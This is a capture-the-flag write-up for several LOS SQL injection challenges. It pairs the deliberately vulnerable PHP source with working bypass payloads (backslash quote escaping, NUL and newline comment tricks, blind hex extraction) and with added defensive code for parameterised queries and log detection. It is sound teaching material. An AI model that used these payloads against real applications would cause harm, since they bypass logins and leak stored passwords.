assassin
<?php
include "./config.php";
login_chk();
$db = dbconnect();
// Only the single quote is blocked; the LIKE wildcards % and _ pass through.
if(preg_match('/\'/i', $_GET[pw])) exit("No Hack ~_~");
// pw is interpolated straight into a LIKE pattern.
$query = "select id from prob_assassin where pw like '{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
// Echoing the matched id tells the caller which row the pattern hit first.
if($result['id']) echo "<h2>Hello {$result[id]}</h2>";
if($result['id'] == 'admin') solve("assassin");
highlight_file(__FILE__);
The query uses LIKE for fuzzy matching. A quick search shows that MySQL's LIKE syntax supports wildcard matching:
LIKE 'a%' matches every string that begins with the character a.
So, as in the code above, one pattern can match more than one row.
Fuzzing with Burp shows that LIKE '9%' matches a record, but the page prints "Hello guest". From this we learn that the first character of guest's password is the same as admin's, and since guest's row comes before admin's, admin cannot be matched yet. Continuing in the same way, admin's row is only matched once the pattern reaches the third character.
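The two defects in this challenge are the LIKE pattern built from user input and the "Hello <id>" line that reveals which row matched. The following is an added example, not code from the writeup or the LOS challenge; it assumes the $db mysqli connection and the prob_assassin(id, pw) table from the challenge, and the function names are the example's own. It shows the exact-match lookup that replaces the interpolated LIKE, and, for the case where a LIKE prefix search is genuinely wanted, a LIKE escape applied before the value is bound (binding alone does not neutralise % and _ inside a LIKE pattern).

```php
<?php
// Added example, not part of the original writeup or the LOS challenge code.
// Assumes the $db mysqli connection and the prob_assassin(id, pw) table from
// the challenge; the function names are the example's own.

// Make a failed prepare/execute throw instead of silently returning false
// (this is already the default from PHP 8.1 on).
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

// Escape the LIKE metacharacters so a bound pattern is matched literally.
// The backslash is MySQL's default LIKE escape character, so it is handled first.
function escape_like(string $value): string
{
    return str_replace(['\\', '%', '_'], ['\\\\', '\\%', '\\_'], $value);
}

// Exact-match check. The value is bound, never interpolated, and the comparison
// is '=', so neither quotes nor wildcards in the input mean anything. Only a
// boolean for the expected user is returned; the matched id is never echoed.
function password_matches_user(mysqli $db, string $expectedId, string $pw): bool
{
    $stmt = $db->prepare('SELECT id FROM prob_assassin WHERE id = ? AND pw = ?');
    $stmt->bind_param('ss', $expectedId, $pw);
    $stmt->execute();
    $stmt->bind_result($id);
    $matched = $stmt->fetch() === true;
    $stmt->close();
    return $matched;
}

// Prefix search for the cases where LIKE is genuinely wanted. The wildcard is
// appended by the code and the user-supplied part is escaped, so a '%' or '_'
// typed by the user matches only itself.
function ids_with_prefix(mysqli $db, string $prefix): array
{
    $pattern = escape_like($prefix) . '%';
    $stmt = $db->prepare('SELECT id FROM prob_assassin WHERE id LIKE ?');
    $stmt->bind_param('s', $pattern);
    $stmt->execute();
    $stmt->bind_result($id);
    $ids = [];
    while ($stmt->fetch()) {
        $ids[] = $id;
    }
    $stmt->close();
    return $ids;
}

// Usage in place of the challenge's interpolated LIKE query.
$pw = (string) ($_GET['pw'] ?? '');
if (password_matches_user($db, 'admin', $pw)) {
    solve("assassin");
}
```

With the exact-match check, the character-by-character oracle described above disappears for two reasons: the pattern characters are no longer special, and the response no longer says which row was found.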
succubus
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~");
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
// The single quote is blocked in both parameters, but the backslash is not.
if(preg_match('/\'/',$_GET[id])) exit("HeHe");
if(preg_match('/\'/',$_GET[pw])) exit("HeHe");
$query = "select id from prob_succubus where id='{$_GET[id]}' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']) solve("succubus");
highlight_file(__FILE__);
The single quote is filtered, but the backslash is not. Injecting a \ swallows the single quote that follows it, so the quote is escaped and the literal is broken out of.
payload
?id=\&pw=or 1%23
ZOMBIE_ASSASSIN
<?php
include "./config.php";
login_chk();
$db = dbconnect();
// Escaping runs before the reversal, so the backslash that addslashes adds ends
// up after the character it was protecting.
$_GET['id'] = strrev(addslashes($_GET['id']));
$_GET['pw'] = strrev(addslashes($_GET['pw']));
if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~");
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
$query = "select id from prob_zombie_assassin where id='{$_GET[id]}' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']) solve("zombie_assassin");
highlight_file(__FILE__);
This challenge works much like the previous one: again a backslash is used to escape the single quote.
addslashes does escape backslashes, but the escape it adds is itself a backslash, and because strrev runs after addslashes that added backslash can be moved to the end of the value. Using this property correctly is enough to bypass the filter.
payload
?id=%00&pw=%231 ro
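The succubus and zombie_assassin sections both come down to one rule: escaping has to be the last transformation applied to a value before it is interpolated, and a value that ends in an unescaped backslash will consume the closing quote. The block below is an added example, not code from the writeup or the challenge; it needs no database and compares the three pipelines (no escaping, as in succubus; escape then reverse, as in zombie_assassin; reverse then escape) on constructed inputs, with a small check for a dangling backslash that a code reviewer or test suite can apply to any escaped value.

```php
<?php
// Added example, not part of the original writeup or the LOS challenge code.
// String-level only (no database): shows why the order of addslashes and
// strrev matters. The inputs below are constructed.

// A value destined for a single-quoted SQL literal can only consume the closing
// quote if it ends with an unescaped backslash, i.e. an odd run of backslashes.
function ends_with_unescaped_backslash(string $escaped): bool
{
    $run = strlen($escaped) - strlen(rtrim($escaped, '\\'));
    return $run % 2 === 1;
}

// The three pipelines compared: none (succubus), escape-then-reverse
// (zombie_assassin), and reverse-then-escape (escaping applied last).
function pipelines(string $raw): array
{
    return [
        'none'               => $raw,
        'strrev(addslashes)' => strrev(addslashes($raw)),
        'addslashes(strrev)' => addslashes(strrev($raw)),
    ];
}

// Constructed inputs: a lone backslash (the succubus value), a NUL byte (the
// zombie_assassin value, which addslashes turns into the two characters \0),
// and a harmless string for comparison.
foreach (["\\", "\0", "abc"] as $raw) {
    foreach (pipelines($raw) as $name => $value) {
        printf("%-9s %-20s %-10s dangling backslash: %s\n",
            json_encode($raw), $name, json_encode($value),
            ends_with_unescaped_backslash($value) ? 'yes' : 'no');
    }
}
```

Running it shows the lone backslash dangling only in the unescaped pipeline, and the NUL byte dangling only in the escape-then-reverse pipeline, where addslashes produced \0 and strrev turned it into 0\. Reversing first and escaping last leaves no dangling backslash in either case; parameter binding, as in the assassin example, removes the question entirely.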
nightmare
<?php
include "./config.php";
login_chk();
$db = dbconnect();
// # and - are blocked and the value is capped at 6 characters, but ; and NUL are not.
if(preg_match('/prob|_|\.|\(\)|#|-/i', $_GET[pw])) exit("No Hack ~_~");
if(strlen($_GET[pw])>6) exit("No Hack ~_~");
$query = "select id from prob_nightmare where pw=('{$_GET[pw]}') and id!='admin'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']) solve("nightmare");
highlight_file(__FILE__);
Both the length and the usual comment characters are filtered.
Use ;%00 in place of a comment.
Use ^ in place of the logical operator.
payload
?pw=')^0;%00
xavis
This time the password is Korean, so the hex() function is used to convert it to hexadecimal and the hex string is brute-forced.
payload
?pw=1' or id='admin' and ord(substr(hex(pw),27,1))>79%23
DRAGON
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
// The # is meant to comment out the pw clause, but a # comment ends at the next newline.
$query = "select id from prob_dragon where id='guest'# and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['id']) echo "<h2>Hello {$result[id]}</h2>";
if($result['id'] == 'admin') solve("dragon");
highlight_file(__FILE__);
Looking for a way past the # comment: # is a single-line comment, and as the name says it cannot comment out the next line. That is the opening.
Pass %0a as the newline character.
payload
?pw=1'%0aand pw = '1'or id='admin'%23
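Across nightmare and dragon (and the earlier challenges) the deny-lists and length cap are beaten by bytes the filters never consider: a NUL that ends the statement, a newline that ends a # comment, a backslash left before a quote. The block below is an added example, not code from the writeup or the challenge: a heuristic check over request query strings that flags those markers, run over constructed sample log lines whose query strings are the ones this writeup uses. It is a log-review aid for spotting such requests after the fact, not a substitute for parameterised queries.

```php
<?php
// Added example, not part of the original writeup or the LOS challenge code.
// Heuristic triage of request query strings for the markers the bypasses on
// this page rely on: control bytes that end a line or statement, a dangling
// backslash, and SQL comment markers. The sample log lines are constructed.

function suspicious_query_markers(string $queryString): array
{
    // parse_str percent-decodes, so %00 becomes a NUL byte and %0a a newline.
    parse_str(ltrim($queryString, '?'), $params);
    $findings = [];
    foreach ($params as $name => $value) {
        if (!is_string($value)) {
            continue;
        }
        if (strpbrk($value, "\0\r\n") !== false) {
            $findings[] = "$name: control byte (NUL/CR/LF) in value";
        }
        // An odd run of trailing backslashes would consume the closing quote of
        // a single-quoted SQL literal.
        $run = strlen($value) - strlen(rtrim($value, '\\'));
        if ($run % 2 === 1) {
            $findings[] = "$name: dangling backslash";
        }
        if (preg_match('/#|--[ \t]|\/\*/', $value)) {
            $findings[] = "$name: SQL comment marker";
        }
    }
    return $findings;
}

// Constructed sample lines in the form "<client> <request-target>".
$samples = [
    '203.0.113.5 /succubus/?id=\&pw=or%201%23',
    '203.0.113.5 /zombie_assassin/?id=%00&pw=%231%20ro',
    '203.0.113.5 /nightmare/?pw=%27)^0;%00',
    '203.0.113.5 /dragon/?pw=1%27%0aand%20pw%20=%20%271%27or%20id=%27admin%27%23',
    '198.51.100.7 /dragon/?pw=hunter2',
];

foreach ($samples as $line) {
    [$client, $target] = explode(' ', $line, 2);
    $path = strtok($target, '?');
    $query = (string) parse_url($target, PHP_URL_QUERY);
    $findings = suspicious_query_markers($query);
    printf("%-13s %-18s %s\n", $client, $path,
        $findings ? implode('; ', $findings) : 'clean');
}
```

The last sample is the control: an ordinary password produces no findings. Each of the four writeup requests produces at least one, which is what makes the check useful for a first pass over access logs; the real fix for the endpoints themselves remains binding the values instead of interpolating them, and not relying on a trailing comment to disable part of a query.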